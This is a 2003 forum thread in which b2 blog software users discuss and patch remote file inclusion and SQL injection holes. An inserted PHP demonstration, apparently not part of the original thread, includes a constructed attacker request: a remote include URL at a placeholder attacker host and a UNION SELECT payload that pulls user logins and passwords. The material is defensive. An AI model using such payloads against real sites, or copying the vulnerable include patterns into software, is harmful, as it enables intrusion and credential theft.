michel v Site Admin
Joined: 25 Jan 2002 Posts: 799 Location: Corsica
Posted: Fri May 23, 2003 1:02 am Post subject: Security hole in last official b2 releases
There is a little security hole in the files gm-2-b2.php and blogger-2-b2.php in the b2tools/ directory.
I say "Little" because it's quite easy to correct, a correction will be done on CVS and a new release made shortly.
In the meantime, delete gm-2-b2.php and blogger-2-b2.php or make the following modifications in these files.
In gm-2-b2.php and blogger-2-b2.php, find this line:
Code: | include("b2config.php"); |
and replace it with this line:
Code: | require('b2config.php'); |
allusion
Joined: 16 Jun 2002 Posts: 73 Location: Houston
Posted: Fri May 23, 2003 3:20 am
And of course if you're not using these files there's no real reason to keep them around after installation.
_________________
Matthew Mullenweg
Wordpress
lcf
Joined: 05 May 2003 Posts: 92 Location: Malaysia
Posted: Fri May 23, 2003 5:11 am
Quote: | I say "Little" because it's quite easy to correct, a correction will be done on CVS and a new release made shortly.
|
Wow! I can't wait for it!
_________________
LcF
http://weblog.lcfwebsite.com
mikelittle
Joined: 11 May 2002 Posts: 376 Location: UK
Posted: Wed Jun 04, 2003 1:47 am Post subject: More security problems.
There have been another couple of security problems posted on the bugtraq mailing list.
Quote: |
"b2 0.6.1 with ljupdate" allows remote command execution in
./b2-include/b2functions.php. A malicious user can inject a URL in $b2inc,
and obtain command execution with web server privileges (usually nobody).
"b2 0.6.2 and prior" allows SQL injection in ./blog.header.php. $posts isn't
converted to an integer, so we can inject SQL into this variable. In MySQL 4.x
UNION and subselects can be used to obtain privileges.
"b2 0.6.2 and prior" has a little flaw. Bored users can force the server to read
a remote file using $b2inc in ./b2-include/b2menutop.php
|
I don't have access to the code to fix the first issue.
The second issue has been fixed in CVS. It is a simple change:
File blog.header.php line 69:
Code: |
if ($posts)
    $posts_per_page = $posts;
|
should be changed to
Code: |
if ($posts) {
    $posts = (int)$posts;
    $posts_per_page = $posts;
}
|
The third has also been fixed in CVS.
File b2-include/b2menutop.php line 32
Code: |
$menu = file($b2inc."/b2menutop.txt");
|
becomes
Code: |
require_once("b2config.php");
$menu = file($b2inc."/b2menutop.txt");
|
Note this will cause an error if the file is loaded on its own, but that's OK: it should only ever be included.
Mike
_________________
Mike Little
http://zed1.com/journalized/
"Share what you know. Learn what you don't."
cjc
Joined: 24 Dec 2002 Posts: 146 Location: New York
Posted: Wed Jun 04, 2003 3:24 am Post subject: Re: More security problems.
mikelittle wrote: | There have been another couple of security problems posted on the bugtraq mailing list.
Quote: |
"b2 0.6.1 with ljupdate" allows remote command execution in
./b2-include/b2functions.php. A malicious user can inject a URL in $b2inc,
and obtain command execution with web server privileges (usually nobody).
|
I don't have access to the code to fix the first issue.
|
The fix is like the last one:
near the end of the b2-include/b2functions.php file, there is a line like:
Code: | require_once($b2inc."/lj_update.php"); |
Change this to:
Code: |
require_once("b2config.php");
require_once($b2inc."/lj_update.php");
|
I'm not sure if these problems should be characterized as "little". Yes, they're easy to fix, but not fixing them can have serious consequences. There's a thread in the "Chat Away" forum where someone details his experience of being hacked because of the gm-2-b2.php problem. It should be noted that having PHP configured with register_globals off will stop this exploit, too.
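The two posts above (Mike's CVS fixes and cjc's note on register_globals) describe the same mechanism: under register_globals=On, a request parameter named b2inc or posts becomes a PHP global before the script's first line runs, and any file that uses that global before b2config.php has assigned it is reading attacker input. The following is an added example, not b2's own code, that simulates that in one stand-alone script: the request-to-globals step, the vulnerable and fixed shapes of the $b2inc include path and the $posts value, and what register_globals=Off changes. The config path, the attacker host and the table name in the payload are constructed for the demo; nothing is fetched, included or queried.

```php
<?php
// Added example (not from b2): why $b2inc / $posts were exploitable under
// register_globals and what the two CVS fixes change. Self-contained: no real
// b2 files, no network, no database.
declare(strict_types=1);

// Stand-in for the `$b2inc = ...` line in b2config.php (path is an assumption).
const B2INC_FROM_CONFIG = '/var/www/b2/b2-include';

// register_globals=On: every request parameter became a same-named global
// before the script ran, so ?b2inc=X meant $b2inc == "X" on line 1. We model
// "the globals as the script first sees them" as an array.
function globals_after_request(array $query, bool $registerGlobals): array
{
    return $registerGlobals ? $query : [];
}

// Vulnerable shape of b2menutop.php / b2functions.php: $b2inc is used before
// this file has defined it, so the request-supplied value wins. With
// allow_url_fopen on, require_once() of an http:// path fetches and runs it.
function include_path_vulnerable(array $vars): string
{
    $b2inc = $vars['b2inc'] ?? '';      // undefined variable -> "" (globals off)
    return $b2inc . '/lj_update.php';
}

// Fixed shape: require_once("b2config.php") runs first and assigns $b2inc,
// discarding whatever register_globals put there.
function include_path_fixed(array $vars): string
{
    $vars['b2inc'] = B2INC_FROM_CONFIG; // what the config include does
    return $vars['b2inc'] . '/lj_update.php';
}

// Vulnerable shape of blog.header.php: $posts reaches the query untouched.
function posts_per_page_vulnerable(array $vars, int $default = 10): string
{
    $posts = $vars['posts'] ?? '';
    return $posts ? (string)$posts : (string)$default;
}

// Fixed shape: (int) keeps only a leading integer; " UNION ..." is dropped,
// so the value can no longer carry SQL.
function posts_per_page_fixed(array $vars, int $default = 10): int
{
    $posts = $vars['posts'] ?? '';
    return $posts ? (int)$posts : $default;
}

// True for any scheme:// path, i.e. one that a URL wrapper would fetch.
function is_remote(string $path): bool
{
    return (bool)preg_match('#^[a-z][a-z0-9+.-]*://#i', $path);
}

// Constructed attacker request: remote include target plus a UNION payload.
// "attacker.example" and "b2users" are placeholders, not real targets.
$attack = [
    'b2inc' => 'http://attacker.example/shell',
    'posts' => '1 UNION SELECT user_login,user_pass FROM b2users',
];

foreach ([true, false] as $rg) {
    $vars  = globals_after_request($attack, $rg);
    $label = $rg ? 'register_globals=On ' : 'register_globals=Off';
    $vuln  = include_path_vulnerable($vars);
    printf("%s  vulnerable include: %-40s remote=%s\n",
        $label, $vuln, is_remote($vuln) ? 'yes' : 'no');
    printf("%s  fixed include:      %s\n", $label, include_path_fixed($vars));
    printf("%s  vulnerable \$posts:  %s\n",
        $label, var_export(posts_per_page_vulnerable($vars), true));
    printf("%s  fixed \$posts:       %d\n\n", $label, posts_per_page_fixed($vars));
}
```

Run it with `php example.php`. With register_globals on, the vulnerable include path is the attacker's URL and the vulnerable $posts value is the whole UNION string; the fixed versions yield the local path and the integer 1. With register_globals off, the vulnerable include path degrades to "/lj_update.php" (an undefined-variable notice and a failed include in real b2, not code execution) and $posts falls back to the default, which is the point cjc makes. The require_once("b2config.php") fix only works because b2config.php unconditionally assigns $b2inc; a config file that set it conditionally would leave the hole open.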
Mister44
Joined: 31 Oct 2002 Posts: 237 Location: Philadelphia, PA, USA
Posted: Wed Jun 04, 2003 12:58 pm
For LjUpdate users, it's far better to update to the latest version... This was fixed two months ago according to my cvs logs.
michel v Site Admin
Joined: 25 Jan 2002 Posts: 799 Location: Corsica
Posted: Wed Jun 18, 2003 10:59 pm
Mister44, please PM/email me with your Sourceforge ID so I can add you to the people able to do releases.
This way you can just release new versions of b2+ljupdate on the Sourceforge page.
Sigg3
Joined: 03 Jul 2003 Posts: 760 Location: Oslo, Norway